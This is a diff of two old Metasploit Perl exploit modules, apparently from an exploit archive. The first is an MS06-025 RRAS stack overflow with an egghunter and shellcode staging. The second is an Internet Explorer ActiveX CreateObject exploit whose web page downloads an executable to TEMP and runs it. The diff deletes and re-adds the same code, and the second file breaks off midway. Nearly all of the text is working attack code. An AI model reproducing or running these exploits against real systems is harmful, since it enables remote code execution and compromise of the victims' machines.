-	my $FragSize = $self->GetVar('FragSize') || 256;
-	my $target   = $self->Targets->[$target_idx];
-
-	my ( $res, $rpc );
-
-	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
-	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
-	my $version = '1.0';
-
-	my $handle =
-	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
-		$pipe );
-
-	my $dce = Pex::DCERPC->new(
-		'handle'      => $handle,
-		'username'    => $self->GetVar('SMBUSER'),
-		'password'    => $self->GetVar('SMBPASS'),
-		'domain'      => $self->GetVar('SMBDOM'),
-		'fragsize'    => $self->GetVar('FragSize'),
-		'bindevasion' => $self->GetVar('BindEvasion'),
-		'directsmb'   => $self->GetVar('DirectSMB'),
-	  );
-
-	if ( !$dce ) {
-		$self->PrintLine("[*] Could not bind to $handle");
-		return;
-	}
-
-	my $smb = $dce->{'_handles'}{$handle}{'connection'};
-	if ( $target->[0] =~ /Auto/ ) {
-		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
-			$target = $self->Targets->[1];
-			$self->PrintLine('[*] Detected a Windows 2000 target...');
-		}
-		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
-		#	$target = $self->Targets->[2];
-		#	$self->PrintLine('[*] Detected a Windows XP target...');
-		#}
-		else {
-			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
-			return;
-		}
-	}
-
-	# Shiny new egghunt from the 3.0 code :-)
-	my $egghunt =
-	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
-	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
-	  "\x41\x41\x41\x41".
-	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
-
-	# Pick a "filler" character that we know doesn't get mangled
-	# by the wide string conversion routines
-	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
-	my $filler  = substr($fillset, rand(length($fillset)), 1);
-	my $eggtag  = '';
-	my $pattern = '';
-
-	while (length($eggtag) < 4) {
-		$eggtag .= substr($fillset, rand(length($fillset)), 1);
-	}
-
-	# Configure the egg
-	substr($egghunt, 0x12, 4, $eggtag);
-
-	# We use an egghunter to give us nearly unlimited room for shellcode
-	my $eggdata =
-	  ($filler x 1024).
-	  $eggtag.
-	  $eggtag.
-	  $shellcode.
-	  ($filler x 1024);
-
-	# Mini-payload that launches the egghunt
-	my $bof = $filler x 178;
-	substr($bof, 84, length($egghunt), $egghunt);
-
-	# Base pointer override occurs with this string
-	my $pat =
-	  ($filler x 886).
-	  pack('V', $target->[1]).
-	  ($filler x 3). "\xc0".
-	  $bof;
-
-	# The vulnerability is triggered with the second field of this structure
-	my $type2 =
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
-	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
-	  Pex::NDR::Long( int(rand(0xffffffff)) ).
-	  Pex::NDR::Long( int(rand(0xffffffff)) );
-
-	# Another gigantic structure, many of these fields up as registry values
-	my $type1 =
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
-	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
-	  Pex::NDR::Long(0x45).
-	  $type2.
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  Pex::NDR::Long(int(rand(0xffffffff)));
-
-	# Create the actual RPC stub and tack our payload on the end
-	my $stub =
-	  $type1.
-	  Pex::NDR::Long(int(rand(0xffffffff))).
-	  $eggdata;
-
-	$self->PrintLine("[*] Creating the malicious registry key...");
-	my @response = $dce->request( $handle, 0x0A, $stub );
-
-	$self->PrintLine("[*] Triggering the base pointer overwrite...");
-	my @response = $dce->request( $handle, 0x0A, $stub );
-
-	if (@response) {
-		$self->PrintLine('[*] RPC server responded with:');
-		foreach my $line (@response) {
-			$self->PrintLine( '[*] ' . $line );
-		}
-		$self->PrintLine('[*] This probably means that the system is patched');
-	}
-	return;
-}
-
-1;
-
-# milw0rm.com [2006-06-29]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::rras_ms06_025_rasman;
+use base "Msf::Exploit";
+use strict;
+
+use Pex::DCERPC;
+use Pex::SMB;
+use Pex::NDR;
+
+my $advanced = {
+	'FragSize'    => [ 256, 'The DCERPC fragment size' ],
+	'BindEvasion' => [ 0,   'IDS Evasion of the Bind request' ],
+	'DirectSMB'   => [ 0,   'Use direct SMB (445/tcp)' ],
+  };
+
+my $info = {
+	'Name'    => 'Microsoft RRAS MSO6-025 RASMAN Registry Stack Overflow',
+	'Version' => '$Revision: 1.1 $',
+	'Authors' =>
+	  [
+		'Pusscat <pusscat [at] gmail.com>',
+		'H D Moore <hdm [at] metasploit.com>'
+	  ],
+
+	'Arch' => ['x86'],
+	'OS'   => [ 'win32', 'win2000', 'winxp' ],
+	'Priv' => 1,
+
+	'AutoOpts' => { 'EXITFUNC' => 'thread' },
+	'UserOpts' =>
+	  {
+		'RHOST' => [ 1, 'ADDR', 'The target address' ],
+
+		# SMB connection options
+		'SMBUSER' => [ 0, 'DATA', 'The SMB username to connect with', '' ],
+		'SMBPASS' => [ 0, 'DATA', 'The password for specified SMB username',''],
+		'SMBDOM'  => [ 0, 'DATA', 'The domain for specified SMB username', '' ],
+		'SMBPIPE' => [ 1, 'DATA', 'The pipe name to use (2000=ROUTER, XP=SRVSVC)', 'ROUTER' ],
+	  },
+
+	'Payload' =>
+	  {
+		'Space'    =>1024,
+		'BadChars' => "\x00\x2c\x5c\x2e\x3a\x24",
+
+		# sub esp, 4097 + inc esp makes stack happy
+		'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
+	  },
+
+	'Description' => Pex::Text::Freeform(
+		qq{
+    		This module exploits a registry-based stack overflow in the Windows Routing 
+			and Remote Access Service. Since the service is hosted inside svchost.exe, 
+			a failed exploit attempt can cause other system services to fail as well. 
+			A valid username and password is required to exploit this flaw on Windows 2000. 
+			When attacking XP SP1, the SMBPIPE option needs to be set to 'SRVSVC'.
+			Exploiting this flaw involves two distinct steps - creating the registry key
+			and then triggering an overwrite based on a read of this key. Once the key is
+			created, it cannot be recreated. This means that for any given system, you
+			only get one chance to exploit this flaw. Picking the wrong target will require
+			a manual removal of the following registry key before you can try again:
+			HKEY_USERS\\.DEFAULT\\Software\\Microsoft\\RAS Phonebook
+}
+	  ),
+
+	'Refs' =>
+	  [
+		[ 'BID', '18325' ],
+		[ 'CVE', '2006-2370' ],
+		[ 'OSVDB', '26437' ],
+		[ 'MSB', 'MS06-025' ]
+	  ],
+
+	'DefaultTarget' => 0,
+	'Targets'       =>
+	  [
+		[ 'Automatic' ],
+		[ 'Windows 2000',   0x750217ae ], # call esi
+	  ],
+
+	'Keys' => ['rras'],
+
+	'DisclosureDate' => 'Jun 13 2006',
+  };
+
+sub new {
+	my ($class) = @_;
+	my $self    = $class->SUPER::new( { 'Info' => $info, 'Advanced' => $advanced }, @_ );
+	return ($self);
+}
+
+sub Exploit {
+	my ($self)      = @_;
+	my $target_host = $self->GetVar('RHOST');
+	my $target_port = $self->GetVar('RPORT');
+	my $target_idx  = $self->GetVar('TARGET');
+	my $shellcode   = $self->GetVar('EncodedPayload')->Payload;
+	my $target      = $self->Targets->[$target_idx];
+
+	my $FragSize = $self->GetVar('FragSize') || 256;
+	my $target   = $self->Targets->[$target_idx];
+
+	my ( $res, $rpc );
+
+	my $pipe    = "\\" . $self->GetVar("SMBPIPE");
+	my $uuid    = '20610036-fa22-11cf-9823-00a0c911e5df';
+	my $version = '1.0';
+
+	my $handle =
+	  Pex::DCERPC::build_handle( $uuid, $version, 'ncacn_np', $target_host,
+		$pipe );
+
+	my $dce = Pex::DCERPC->new(
+		'handle'      => $handle,
+		'username'    => $self->GetVar('SMBUSER'),
+		'password'    => $self->GetVar('SMBPASS'),
+		'domain'      => $self->GetVar('SMBDOM'),
+		'fragsize'    => $self->GetVar('FragSize'),
+		'bindevasion' => $self->GetVar('BindEvasion'),
+		'directsmb'   => $self->GetVar('DirectSMB'),
+	  );
+
+	if ( !$dce ) {
+		$self->PrintLine("[*] Could not bind to $handle");
+		return;
+	}
+
+	my $smb = $dce->{'_handles'}{$handle}{'connection'};
+	if ( $target->[0] =~ /Auto/ ) {
+		if ( $smb->PeerNativeOS eq 'Windows 5.0' ) {
+			$target = $self->Targets->[1];
+			$self->PrintLine('[*] Detected a Windows 2000 target...');
+		}
+		#elsif ( $smb->PeerNativeOS eq 'Windows 5.1' ) {
+		#	$target = $self->Targets->[2];
+		#	$self->PrintLine('[*] Detected a Windows XP target...');
+		#}
+		else {
+			$self->PrintLine( '[*] No target available : ' . $smb->PeerNativeOS() );
+			return;
+		}
+	}
+
+	# Shiny new egghunt from the 3.0 code :-)
+	my $egghunt =
+	  "\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" .
+	  "\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" .
+	  "\x41\x41\x41\x41".
+	  "\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7";
+
+	# Pick a "filler" character that we know doesn't get mangled
+	# by the wide string conversion routines
+	my $fillset = "\xc1\xff\x67\x1b\xd3\xa3\xe7";
+	my $filler  = substr($fillset, rand(length($fillset)), 1);
+	my $eggtag  = '';
+	my $pattern = '';
+
+	while (length($eggtag) < 4) {
+		$eggtag .= substr($fillset, rand(length($fillset)), 1);
+	}
+
+	# Configure the egg
+	substr($egghunt, 0x12, 4, $eggtag);
+
+	# We use an egghunter to give us nearly unlimited room for shellcode
+	my $eggdata =
+	  ($filler x 1024).
+	  $eggtag.
+	  $eggtag.
+	  $shellcode.
+	  ($filler x 1024);
+
+	# Mini-payload that launches the egghunt
+	my $bof = $filler x 178;
+	substr($bof, 84, length($egghunt), $egghunt);
+
+	# Base pointer override occurs with this string
+	my $pat =
+	  ($filler x 886).
+	  pack('V', $target->[1]).
+	  ($filler x 3). "\xc0".
+	  $bof;
+
+	# The vulnerability is triggered with the second field of this structure
+	my $type2 =
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 1024) . "\x00" ).
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( $pat . "\x00" ).
+	  Pex::NDR::UnicodeConformantVaryingStringPreBuilt( ($filler x 4096) . "\x00" ).
+	  Pex::NDR::Long( int(rand(0xffffffff)) ).
+	  Pex::NDR::Long( int(rand(0xffffffff)) );
+
+	# Another gigantic structure, many of these fields up as registry values
+	my $type1 =
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # OperatorDial
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # PreviewPhoneNumber
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # UseLocation
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowLights
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ShowConnectStatus
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # CloseOnDial
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonPhonebookEdits
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # AllowLogonLocationEdits
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # SkipConnectComplete
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # NewEntryWizard
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialAttempts
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialSeconds
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # IdleHangUpSeconds
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # RedialOnLinkFailure
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # PopupOnTopWhenRedialing
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # ExpandAutoDialQuery
+	  Pex::NDR::Long(int(rand(0xffffffff))) . # CallbackMode
+	  Pex::NDR::Long(0x45).
+	  $type2.
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 129).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 520).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::UnicodeConformantVaryingString("\x00" x 514).
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  Pex::NDR::Long(int(rand(0xffffffff)));
+
+	# Create the actual RPC stub and tack our payload on the end
+	my $stub =
+	  $type1.
+	  Pex::NDR::Long(int(rand(0xffffffff))).
+	  $eggdata;
+
+	$self->PrintLine("[*] Creating the malicious registry key...");
+	my @response = $dce->request( $handle, 0x0A, $stub );
+
+	$self->PrintLine("[*] Triggering the base pointer overwrite...");
+	my @response = $dce->request( $handle, 0x0A, $stub );
+
+	if (@response) {
+		$self->PrintLine('[*] RPC server responded with:');
+		foreach my $line (@response) {
+			$self->PrintLine( '[*] ' . $line );
+		}
+		$self->PrintLine('[*] This probably means that the system is patched');
+	}
+	return;
+}
+
+1;
+
+# milw0rm.com [2006-06-29]

platforms/windows/remote/2164.pm

@@ -1,354 +1,354 @@
-##
-# This file is part of the Metasploit Framework and may be redistributed
-# according to the licenses defined in the Authors field below. In the
-# case of an unknown or missing license, this file defaults to the same
-# license as the core Framework (dual GPLv2 and Artistic). The latest
-# version of the Framework can always be obtained from metasploit.com.
-##
-
-package Msf::Exploit::ie_createobject;
-
-use strict;
-use base "Msf::Exploit";
-use Pex::Text;
-use IO::Socket::INET;
-use IPC::Open3;
-
-my $advanced =
-  {
-	'Gzip'       => [1, 'Enable gzip content encoding'],
-	'Chunked'    => [1, 'Enable chunked transfer encoding'],
-  };
-
-my $info =
-  {
-	'Name'           => 'Internet Explorer COM CreateObject Code Execution',
-	'Version'        => '$Revision: 3753 $',
-	'Authors'        =>
-	  [
-		'H D Moore <hdm [at] metasploit.com>',
-	  ],
-
-	'Description'    =>
-	  Pex::Text::Freeform(qq{
-		This module exploits a generic code execution vulnerability in Internet 
-		Explorer by abusing vulnerable ActiveX objects. 
-}),
-
-	'Arch'           => [ 'x86' ],
-	'OS'             => [ 'win32', 'winxp', 'win2003' ],
-	'Priv'           => 0,
-
-	'UserOpts'       =>
-	  {
-		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
-		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
-	  },
-
-	'Payload'        =>
-	  {
-		'Space'    => 4000,
-		'Keys'     => ['-bind'],
-	  },
-	'Refs'           =>
-	  [
-		['MSB', 'MS06-014']
-	  ],
-
-	'DefaultTarget'  => 0,
-	'Targets'        =>
-	  [
-	  	[ 'Automatic' ],
-
-		# Patched
-		[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
-
-		# Not marked as safe
-		[ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
-
-		# Not marked as safe
-		[ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
-		
-		# Not marked as safe
-		[ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],
-
-		# Found exploitable in the wild (no details)
-		[ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],
-
-		# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
-		[ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
-		[ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],
-
-		# Part of the WMI SDK, currently unpatched/unreported
-		[ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],
-		
-		# Visual Studio components, not marked as safe
-		[ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
-		[ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
-		[ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
-		[ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
-		[ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],			
-	  ],
-
-	'Keys'           => [ 'ie' ],
-
-	'DisclosureDate' => '',
-  };
-
-sub new {
-	my $class = shift;
-	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
-	return($self);
-}
-
-sub Exploit
-{
-	my $self = shift;
-
-	my $server = IO::Socket::INET->new(
-		LocalHost => $self->GetVar('HTTPHOST'),
-		LocalPort => $self->GetVar('HTTPPORT'),
-		ReuseAddr => 1,
-		Listen    => 1,
-		Proto     => 'tcp'
-	  );
-	my $client;
-
-	# Did the listener create fail?
-	if (not defined($server)) {
-		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
-		return;
-	}
-
-	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
-	  Pex::Utils::SourceIP('1.2.3.4') :
-	  $self->GetVar('HTTPHOST');
-
-	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
-
-	while (defined($client = $server->accept())) {
-		$self->HandleHttpClient(Msf::Socket::Tcp->new_from_socket($client));
-	}
-
-	return;
-}
-
-sub HandleHttpClient
-{
-	my $self      = shift;
-	my $fd        = shift;
-	my $shellcode = my $shellcode = $self->GetVar('EncodedPayload')->Payload;
-	 
-	# Set the remote host information
-	my ($rport, $rhost) = ($fd->PeerPort, $fd->PeerAddr);
-
-	# Read the HTTP command
-	my ($cmd, $url, $proto) = split / /, $fd->RecvLine(10);
-
-	# Read the HTTP headers
-	my $headers;
-	while ( (my $line = $fd->RecvLine(10))) {
-		$headers .= $line;
-		last if $line eq "\r\n";
-	}
-
-	if ($url =~ /\?payload/) {
-		$self->PrintLine("[*] HTTP Client $rhost:$rport asked for payload...");
-		my $content = Pex::Utils::CreateWin32PE($shellcode, 'ie_createobject');
-		$fd->Send($self->BuildResponse($content, 'application/octet-stream'));
-		$fd->Close;
-		return;
-	}
-	$self->PrintLine("[*] HTTP Client $rhost:$rport asked for exploit page...");
-	$fd->Send($self->BuildResponse($self->GenerateHTML(), 'text/html'));
-	$fd->Close;
-	return;
-}
-
-sub GenerateHTML {
-	my $self       = shift;
-	my $target_idx = $self->GetVar('TARGET');
-	my $objects    = "";
-	
-	if ($target_idx == 0) {
-		foreach my $target (@{ $self->Targets }) {
-			if ($target->[1]) {
-				$objects .= "'".$target->[1]."',";
-			}
-		}
-	} else {
-		my $target = $self->Targets->[$target_idx];
-		$objects .= "'".$target->[1]."',";
-	}
-
-	my $data  = 
-qq#
-<html><head><title></title>
-<script language="javascript">
-
-function Log(m) {
-	var log = document.createElement('p');
-	log.innerHTML = m;
-	document.body.appendChild(log);
-	
-}
-
-function CreateO(o, n) {
-	var r = null;
-	
-	try { eval('r = o.CreateObject(n)') }catch(e){}
-	
-	if (! r) {
-		try { eval('r = o.CreateObject(n, "")') }catch(e){}
-	}
-	
-	if (! r) {
-		try { eval('r = o.CreateObject(n, "", "")') }catch(e){}
-	}
-
-	if (! r) {
-		try { eval('r = o.GetObject("", n)') }catch(e){}
-	}
-	
-	if (! r) {
-		try { eval('r = o.GetObject(n, "")') }catch(e){}
-	}
-	
-	if (! r) {
-		try { eval('r = o.GetObject(n)') }catch(e){}
-	}
-	
-	return(r);	
-}
-
-function Go(a) {
-	Log('Creating helper objects...');
-	var s = CreateO(a, "WScript.Shell");
-	var o = CreateO(a, "ADODB.Stream");
-	var e = s.Environment("Process");
-	
-	Log('Ceating the XMLHTTP object...');
-	var url = document.location + '?payload';
-	var xml = null;
-	var bin = e.Item("TEMP") + "metasploit.exe";
-	var dat; 
-	
-	try { xml=new XMLHttpRequest(); }
-	catch(e) {
-		try { xml = new ActiveXObject("Microsoft.XMLHTTP"); }
-		catch(e) {
-			xml = new ActiveXObject("MSXML2.ServerXMLHTTP");
-		}
-	}
-	
-	if (! xml) return(0);
-
-	Log('Downloading the payload...');	
-	xml.open("GET", url, false)
-	xml.send(null);
-	dat = xml.responseBody;
-
-	Log('Writing the payload to disk...');	
-	o.Type = 1;
-	o.Mode = 3;
-	o.Open();
-	o.Write(dat);
-	o.SaveToFile(bin, 2);
-
-	Log('Executing the payload...');		
-	s.Run(bin,0);
-}
-
-function Exploit() {
-	var i = 0;
-	var t = new Array(${objects}null);
-	
-	while (t[i]) {
-		var a = null;
-		
-		if (t[i].substring(0,1) == '{') {
-			a = document.createElement("object");
-			a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
-		} else {
-			try { a = new ActiveXObject(t[i]); } catch(e){}
-		}
-		
-		if (a) {
-			try {		
-				var b = CreateO(a, "WScript.Shell");
-				if (b) {
-					Log('Loaded ' + t[i]);
-					Go(a);
-					return(0);
-				}
-			} catch(e){}
-		}
-		i++;
-	}
-	Log('Exploit failed.');
-}
-</script>
-</head>
-<body onload='Exploit()'>
-<p>Initializing...</p>
-</body>
-</html>
-#;
-}
-
-sub BuildResponse {
-	my ($self, $content, $type) = @_;
-	$type ||= 'text/plain';
-
-	my $response =
-	  "HTTP/1.1 200 OK\r\n" .
-	  "Content-Type: $type\r\n";
-
-	if ($self->GetVar('Gzip')) {
-		$response .= "Content-Encoding: gzip\r\n";
-		$content = $self->Gzip($content);
-	}
-	if ($self->GetVar('Chunked')) {
-		$response .= "Transfer-Encoding: chunked\r\n";
-		$content = $self->Chunk($content);
-	} else {
-		$response .= 'Content-Length: ' . length($content) . "\r\n" .
-		  "Connection: close\r\n";
-	}
-
-	$response .= "\r\n" . $content;
-
-	return $response;
-}
-
-sub Chunk {
-	my ($self, $content) = @_;
-
-	my $chunked;
-	while (length($content)) {
-		my $chunk = substr($content, 0, int(rand(10) + 1), '');
-		$chunked .= sprintf('%x', length($chunk)) . "\r\n$chunk\r\n";
-	}
-	$chunked .= "0\r\n\r\n";
-
-	return $chunked;
-}
-
-sub Gzip {
-	my $self = shift;
-	my $data = shift;
-	my $comp = int(rand(5))+5;
-
-	my($wtr, $rdr, $err);
-
-	my $pid = open3($wtr, $rdr, $err, 'gzip', '-'.$comp, '-c', '--force');
-	print $wtr $data;
-	close ($wtr);
-	local $/;
-
-	return (<$rdr>);
-}
-
-1;
-
-# milw0rm.com [2006-08-10]
+##
+# This file is part of the Metasploit Framework and may be redistributed
+# according to the licenses defined in the Authors field below. In the
+# case of an unknown or missing license, this file defaults to the same
+# license as the core Framework (dual GPLv2 and Artistic). The latest
+# version of the Framework can always be obtained from metasploit.com.
+##
+
+package Msf::Exploit::ie_createobject;
+
+use strict;
+use base "Msf::Exploit";
+use Pex::Text;
+use IO::Socket::INET;
+use IPC::Open3;
+
+my $advanced =
+  {
+	'Gzip'       => [1, 'Enable gzip content encoding'],
+	'Chunked'    => [1, 'Enable chunked transfer encoding'],
+  };
+
+my $info =
+  {
+	'Name'           => 'Internet Explorer COM CreateObject Code Execution',
+	'Version'        => '$Revision: 3753 $',
+	'Authors'        =>
+	  [
+		'H D Moore <hdm [at] metasploit.com>',
+	  ],
+
+	'Description'    =>
+	  Pex::Text::Freeform(qq{
+		This module exploits a generic code execution vulnerability in Internet 
+		Explorer by abusing vulnerable ActiveX objects. 
+}),
+
+	'Arch'           => [ 'x86' ],
+	'OS'             => [ 'win32', 'winxp', 'win2003' ],
+	'Priv'           => 0,
+
+	'UserOpts'       =>
+	  {
+		'HTTPPORT' => [ 1, 'PORT', 'The local HTTP listener port', 8080      ],
+		'HTTPHOST' => [ 0, 'HOST', 'The local HTTP listener host', "0.0.0.0" ],
+	  },
+
+	'Payload'        =>
+	  {
+		'Space'    => 4000,
+		'Keys'     => ['-bind'],
+	  },
+	'Refs'           =>
+	  [
+		['MSB', 'MS06-014']
+	  ],
+
+	'DefaultTarget'  => 0,
+	'Targets'        =>
+	  [
+	  	[ 'Automatic' ],
+
+		# Patched
+		[ 'MS06-014 - RDS.DataControl', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
+
+		# Not marked as safe
+		[ 'UNKNOWN  - RDS.DataSpace', '{BD96C556-65A3-11D0-983A-00C04FC29E36}'],
+
+		# Not marked as safe
+		[ 'UNKNOWN  - Business Object Factory ', '{AB9BCEDD-EC7E-47E1-9322-D4A210617116}'],
+		
+		# Not marked as safe
+		[ 'UNKNOWN  - Outlook Data Object', '{0006F033-0000-0000-C000-000000000046}'],
+
+		# Found exploitable in the wild (no details)
+		[ 'UNKNOWN  - Outlook.Application', '{0006F03A-0000-0000-C000-000000000046}'],
+
+		# These are restricted by site (might be exploitable via DNS spoofing + SSL fun)
+		[ 'UNKNOWN  - SoftwareDistribution.MicrosoftUpdateWebControl.1', '{6e32070a-766d-4ee6-879c-dc1fa91d2fc3}'],
+		[ 'UNKNOWN  - SoftwareDistribution.WebControl.1', '{6414512B-B978-451D-A0D8-FCFDF33E833C}'],
+
+		# Part of the WMI SDK, currently unpatched/unreported
+		[ 'UNKNOWN  - WMIScriptUtils.WMIObjectBroker2.1', '{7F5B7F63-F06F-4331-8A26-339E03C0AE3D}'],
+		
+		# Visual Studio components, not marked as safe
+		[ 'UNKNOWN  - VsmIDE.DTE', '{06723E09-F4C2-43c8-8358-09FCD1DB0766}'],
+		[ 'UNKNOWN  - DExplore.AppObj.8.0', '{639F725F-1B2D-4831-A9FD-874847682010}'],
+		[ 'UNKNOWN  - VisualStudio.DTE.8.0', '{BA018599-1DB3-44f9-83B4-461454C84BF8}'],
+		[ 'UNKNOWN  - Microsoft.DbgClr.DTE.8.0', '{D0C07D56-7C69-43F1-B4A0-25F5A11FAB19}'],
+		[ 'UNKNOWN  - VsaIDE.DTE', '{E8CCCDDF-CA28-496b-B050-6C07C962476B}'],			
+	  ],
+
+	'Keys'           => [ 'ie' ],
+
+	'DisclosureDate' => '',
+  };
+
+sub new {
+	my $class = shift;
+	my $self = $class->SUPER::new({'Info' => $info, 'Advanced' => $advanced}, @_);
+	return($self);
+}
+
+sub Exploit
+{
+	my $self = shift;
+
+	my $server = IO::Socket::INET->new(
+		LocalHost => $self->GetVar('HTTPHOST'),
+		LocalPort => $self->GetVar('HTTPPORT'),
+		ReuseAddr => 1,
+		Listen    => 1,
+		Proto     => 'tcp'
+	  );
+	my $client;
+
+	# Did the listener create fail?
+	if (not defined($server)) {
+		$self->PrintLine("[-] Failed to create local HTTP listener on " . $self->GetVar('HTTPPORT'));
+		return;
+	}
+
+	my $httphost = ($self->GetVar('HTTPHOST') eq '0.0.0.0') ?
+	  Pex::Utils::SourceIP('1.2.3.4') :
+	  $self->GetVar('HTTPHOST');
+
+	$self->PrintLine("[*] Waiting for connections to http://". $httphost .":". $self->GetVar('HTTPPORT') ."/");
+
